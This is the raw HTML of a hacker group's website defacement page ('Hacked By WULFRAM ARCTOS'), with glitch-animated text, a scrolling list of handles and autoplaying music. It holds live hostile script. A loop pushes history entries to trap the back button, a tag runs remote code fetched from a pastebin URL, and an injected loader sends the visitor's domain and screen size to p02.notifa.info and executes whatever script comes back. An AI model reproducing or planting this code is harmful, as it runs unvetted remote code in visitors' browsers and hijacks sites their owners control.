

<html>
<head>
<script>
(function () {
for(var i = 0; i < 20; i++) {
history.pushState(null, document.title, window.location.href );
}
})(document, window, history);
</script>
<meta property='og:image' content='http://baliforyou.com/x.jpg' />
<meta property='og:image:secure_url' content='http://baliforyou.com/x.jpg' />
<meta property='og:audio' content='http://baliforyou.com/zxmbxe_.mp3' />
<link rel='icon' type='image/png' href='https://i.pinimg.com/originals/5e/b8/11/5eb8114fb8c31c8fb7906129f4ac8896.png' type='image/x-icon'/>
<title>Defaced by GHz7</title>
<meta http-equiv='Content-Security-Policy' content='upgrade-insecure-requests'> 
<meta name='theme-color' content='black'>
<meta http-equiv='Content-Type' content='text/html; charset=Windows-1254'/>
<meta name='description' content='We Just Psycho!'>
<meta name='author' content='GHz7, PsychoXploit'/>
<meta name='keywords' content='GHz7, PsychoXploit'/>
<meta name='googlebot' content='all'/>
<meta name='robots' content='all' />
<meta name='googlebot-news' content='all' />
<meta name='google' content='notranslate'/>
<meta name='og:title' content='Hacked by PsychoXploit'/>
<meta property='og:type' content='website' />
<meta property='og:updated_time' content='1440432930' />
</span>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
<script type='text/javascript' src='https://pastebin.com/raw/ynL2hpMe'></script>
</head>
<style type='text/css'>
@import url('//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap');
body{
  	 overflow:hidden;
  	 display: flex;
  	 align-items: center;
  	 justify-content: center;
  	 margin:0;
  	 padding:0;
  	 width:100%;
  	 background-color:#000;
  	 }
i{
margin:10px;
}
a:link{
color:#000;
}
h1{
	color: #000;
	text-decoration: none;
	border-radius:0px;
	border:0px;
	font-family: 'Shadows Into Light', cursive;
	font-size:50px;
	margin:0px;
	padding:0px;
	animation:lamerkaratan 0.1s linear infinite;
}
pre{
color:white;
}
marquee{
width:100%;
}
@keyframes lamerkaratan{
2%{color:#fff;}
3%{transform:translate(2px,-10px) skewX(3240deg);}
5%{transform:translate(0px,0px) skewX(0deg);}
2% , 54%{transform:translateX(0px) skew(0deg);}
55%{transform:translate(-2px,6px) skew(-5530deg);}
56%{transform:translate(0px,0px) skew(0deg);}
57%{transform:translate(4px,-10px) skew(-70deg);}
58%{transform:translate(0px,0px) skew(0deg);}
62%{transform:translate(0px,20px) skew(0deg);}
63%{transform:translate(4px,-2px) skew(0deg);}
90%{transform:translate(1px,3px); skew(-230deg);}
95%{transform:translate(-7px,2px); skew(-120deg);}
100%{transform:translate(0px,0px) skew(0deg);}
</style>
<body scroll='no' style='overflow: hidden' ondragstart='window.event.returnValue=false' onselectstart='event.returnValue=false'>
<embed src='http://www.baliforyou.com/assets/youngblood.mp3' type='audio/mpeg' autostart='true' loop='true' height='0' width='0'>
<center>
<img title='ARCTOS' class='picture' src='https://owips.com/sites/default/files/clipart/drawn-sadness/389641/drawn-sadness-sad-thing-389641-8865356.png' width='318px' height='446px'/>
<br><h1><font color='red'>HACKED By</font> WULFRAM ARCTOS</h1><br>
<marquee direction='scroll'><pre><font color='red'>GHz7</font> - Ladies2 - VxSee7 - prizeHdru - ./VinceGh05T - Xyp3r2667 - Zeylan7 - Chu404 - Lee7 - Sundaype`em - Hax0rSec166 - Syntrovert7 - Array - T1D4KD1K3N4L - TumanGanz</pre></marquee><br>
<pre id='Clock' style='font-size:38px;font-family:iceland;color:#ff0000;margin:0;'></pre>
</center>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXQNk%2fO0UDPj3xo5FLdM%2fw%2bJA6gOv0wqVXG5DTsgxOzZDEEF76Hp9r4RPSOrbRBSwP%2bWVJWbDmY6XDC9dMTjrY8fh2IHBO5YG5XyK%2b8Zp7sarzlIY6uycsgkkkO8ESEdJbo26Nb8LNN5A3JInyYJlUzkaY%2bnRALmPcrh3fcC1JhCtt8ePf%2f8q0W9Jq0GxgX4WorkAX1zdy6Ac19t%2bpDxcpYQ5S1SmGgfV7%2biLPIvowoGYMVVa5Jh0XOr%2fNOvx2MnXY3%2bJvZwqrQ3AprQfwbYlAxuNHv%2bQEnCa6537IlVCDcCysD42gKbosB%2b%2fkuODqwYJTZ1A%2bqujoQOXYMy58idS09B1I%2b4PYjOYeJ25jwIxqfVI%2f%2fo1XrrIOfLydt3qMpZ4ixsQ2K%2bTZEYWx8VjsnrsMPdkijJ%2b4q4FWkHNeWU2gSOhcgHfJ47nVU8YKOxjTuS7UU1eHIs9%2b749iVx0o4Zl668PdM%2fYJ83xatwuR4ga%2bn2ySTZBXXkxYQzBkJUALbhwNGkUmS3yCMJ8J7%2bSkJ%2fwFGB%2fRZP81zvnHyNS49pKqctq4gHWfJl5uhOj6q5MvKylwJQ0qZ5WKd6A%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
